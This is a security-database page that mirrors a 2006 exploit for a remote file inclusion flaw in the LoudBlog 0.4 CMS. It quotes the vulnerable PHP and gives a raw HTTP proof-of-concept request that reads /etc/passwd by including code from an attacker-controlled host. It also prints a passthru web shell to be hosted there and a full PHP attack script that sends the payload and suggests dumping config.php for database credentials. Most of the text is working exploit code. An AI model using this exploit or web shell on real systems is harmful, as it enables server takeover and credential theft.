Lucene search
K

loudblog_04_incl_xpl.txt

🗓️ 06 Feb 2006 00:00:00Reported by rgodType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

LoudBlog 0.4 arbitrary remote inclusion vulnerability in backend_settings.php allows for remote command execution

Code
`------------- LoudBlog <= 0.4 arbitrary remote inclusion -----------  
  
software:  
site: http://loudblog.de/  
description: "Loudblog is a sleek and easy-to-use Content Management  
System (CMS) for publishing media content on the web. It automatically  
generates a skinnable website and an RSS-Feed for Podcasting. Just  
upload your audio/video files, add some notes and links, and you’re  
done!"  
  
--------------------------------------------------------------------  
i) vulnerable code in loudblog/inc/backend_settings.php at lines 3-6:  
...  
//change the language if required by POST  
if (isset($_POST['language'])) {  
include_once($GLOBALS['path']."/loudblog/lang/".$_POST['language'].".php");  
}  
...  
  
poc:  
  
POST [path_to_loudblog]/loudblog/inc/backend_settings.php?cmd=cat%20/etc/passwd&GLOBALS[path]=http://[somehost] HTTP/1.1\r\n";  
Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a  
Host: [target]  
Content-Length: [data_length]  
Connection: Close  
  
-----------------------------7d529a1d23092a  
Content-Disposition: form-data; name="language\r\n";  
Content-Type:  
  
suntzu  
-----------------------------7d529a1d23092a--  
  
  
where on http:/[somehost]/loudblog/inc/suntzu.php/index.html, you have code like this:  
  
<?php  
echo"Hi Master!";ini_set("max_execution_time",0);passthru($cmd);  
?>  
--------------------------------------------------------------------  
exploit:  
  
<?php  
# ---loudblog_04_incl_xpl.php 8.15 20/01/2006 #  
# #  
# LoudBlog 0.4 remote commands execution #  
# coded by rgod #  
# site: http://rgod.altervista.org #  
# #  
# usage: launch from Apache, fill in requested fields, then go! #  
# #  
# Sun-Tzu: "The general that hearkens to my counsel and acts upon it, will #  
# conquer: let such a one be retained in command! The general that hearkens #  
# not to my counsel nor acts upon it, will suffer defeat:--let such a one be #  
# dismissed!" #  
  
error_reporting(0);  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout", 5);  
ob_implicit_flush (1);  
  
echo'<html><head><title> ******LoudBlog 4.0 remote commands execution***********  
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">  
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:  
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img  
{background-color: #FFFFFF !important} input {background-color: #303030  
!important} option { background-color: #303030 !important} textarea  
{background-color: #303030 !important} input {color: #1CB081 !important} option  
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox  
{background-color: #303030 !important} select {font-weight: normal; color:  
#1CB081; background-color: #303030;} body {font-size: 8pt !important;  
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:  
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em  
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em  
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em  
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:  
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited  
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;  
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;  
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;  
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">  
******LoudBlog 4.0 remote commands execution*********** </p><p class="Stile6">a  
script by rgod at <a href="http://rgod.altervista.org"target="_blank">  
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form  
name="form1" method="post" action="'.$SERVER[PHP_SELF].'"> <p><input  
type="text" name="host"> <span class="Stile5">* target (ex:www.sitename.com)  
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:  
/loudblog/ or just / ) </span></p><p><input type="text" name="cmd"> <span  
class="Stile5"> * specify a command ("cat ./../config.php" to see database  
username & password) </span></p> <p> <input type="text"  
name="LOCATION"><span class="Stile5"> * a remote location ( ex: http://www.somes  
ite.com) </span></p><p><input type="text" name="port"><span class="Stile5">speci  
fy a port other than 80 (default value)</span> </p> <p><input type="text"  
name="proxy"><span class="Stile5">send exploit through an HTTP proxy (ip:port)  
</span></p><p><input type="submit" name="Submit" value="go!"></p></form> </td>  
</tr></table></body></html>';  
  
function show($headeri)  
{  
$ii=0;$ji=0;$ki=0;$ci=0;  
echo '<table border="0"><tr>';  
while ($ii <= strlen($headeri)-1){  
$datai=dechex(ord($headeri[$ii]));  
if ($ji==16) {  
$ji=0;  
$ci++;  
echo "<td>&nbsp;&nbsp;</td>";  
for ($li=0; $li<=15; $li++) {  
echo "<td>".$headeri[$li+$ki]."</td>";  
}  
$ki=$ki+16;  
echo "</tr><tr>";  
}  
if (strlen($datai)==1) {  
echo "<td>0".$datai."</td>";  
}  
else {  
echo "<td>".$datai."</td> ";  
}  
$ii++;$ji++;  
}  
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {  
echo "<td>&nbsp&nbsp</td>";  
}  
for ($li=$ci*16; $li<=strlen($headeri); $li++) {  
echo "<td>".$headeri[$li]."</td>";  
}  
echo "</tr></table>";  
}  
  
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';  
  
function sendpacket() //2x speed  
{  
global $proxy, $host, $port, $packet, $html, $proxy_regex;  
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);  
if ($socket < 0) {  
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";  
}  
else {  
$c = preg_match($proxy_regex,$proxy);  
if (!$c) {echo 'Not a valid prozy...';  
die;  
}  
echo "OK.<br>";  
echo "Attempting to connect to ".$host." on port ".$port."...<br>";  
if ($proxy=='') {  
$result = socket_connect($socket, $host, $port);  
}  
else {  
$parts =explode(':',$proxy);  
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';  
$result = socket_connect($socket, $parts[0],$parts[1]);  
}  
if ($result < 0) {  
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";  
}  
else {  
echo "OK.<br><br>";  
$html= '';  
socket_write($socket, $packet, strlen($packet));  
echo "Reading response:<br>";  
while ($out= socket_read($socket, 2048)) {$html.=$out;}  
echo nl2br(htmlentities($html));  
echo "Closing socket...";  
socket_close($socket);  
}  
}  
}  
  
function sendpacketii($packet)  
{  
global $proxy, $host, $port, $html, $proxy_regex;  
if ($proxy=='') {  
$ock=fsockopen(gethostbyname($host),$port);  
if (!$ock) {  
echo 'No response from '.htmlentities($host); die;  
}  
}  
else {  
$c = preg_match($proxy_regex,$proxy);  
if (!$c) {  
echo 'Not a valid prozy...';die;  
}  
$parts=explode(':',$proxy);  
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';  
$ock=fsockopen($parts[0],$parts[1]);  
if (!$ock) {  
echo 'No response from proxy...';die;  
}  
}  
fputs($ock,$packet);  
if ($proxy=='') {  
$html='';  
while (!feof($ock)) {  
$html.=fgets($ock);  
}  
}  
else {  
$html='';  
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {  
$html.=fread($ock,1);  
}  
}  
fclose($ock);echo nl2br(htmlentities($html));  
}  
  
$host=$_POST[host];$path=$_POST[path];  
$port=$_POST[port];$CMD=$_POST[cmd];  
$LOCATION=$_POST[LOCATION];$proxy=$_POST[proxy];  
  
if (($host<>'') and ($path<>'') and ($CMD<>'') and ($LOCATION<>''))  
{  
$port=intval(trim($port));  
if ($port=='') {$port=80;}  
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}  
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}  
$host=str_replace("\r\n","",$host);  
$path=str_replace("\r\n","",$path);  
$CMD=urlencode($CMD);  
$LOCATION=urlencode($LOCATION);  
  
#STEP X -> one and unique, arbitrary remote inclusion...  
$data="-----------------------------7d529a1d23092a\r\n";  
$data.="Content-Disposition: form-data; name=\"language\"\r\n";  
$data.="Content-Type:\r\n\r\n";  
$data.="suntzu\r\n";  
$data.="-----------------------------7d529a1d23092a--\r\n";  
$packet="POST ".$p."loudblog/inc/backend_settings.php?cmd=".$CMD."&GLOBALS[path]=".$LOCATION." HTTP/1.1\r\n";  
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="User-Agent: Googlebot 2.1\r\n";  
$packet.="Content-Length: ".strlen($data)."\r\n";  
$packet.="Connection: Close\r\n\r\n";  
$packet.=$data;  
show($packet);  
sendpacketii($packet);  
if (eregi("HiMaster!",$html)) {echo "Exploit succeeded...";}  
else {echo "Exploit failed...";}  
}  
else  
{echo "Note: on remote location you need this code in <br>  
http:/[remote_location]/loudblog/inc/suntzu.php/index.html :<br>";  
echo nl2br(htmlentities("  
<?php  
echo\"HiMaster!\";ini_set(\"max_execution_time\",0);passthru(\$cmd);  
?>  
"));  
echo "Fill * required fields, optionally specify a proxy...";}  
  
?>  
  
--------------------------------------------------------------------  
rgod  
  
site: http://retrogod.altervista.org  
mail: rgod at autistici org  
original adivsory: http://retrogod.altervista.org/loudblog_04_incl_xpl.html  
--------------------------------------------------------------------  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2006 00:00Current
7.4High risk
Vulners AI Score7.4
22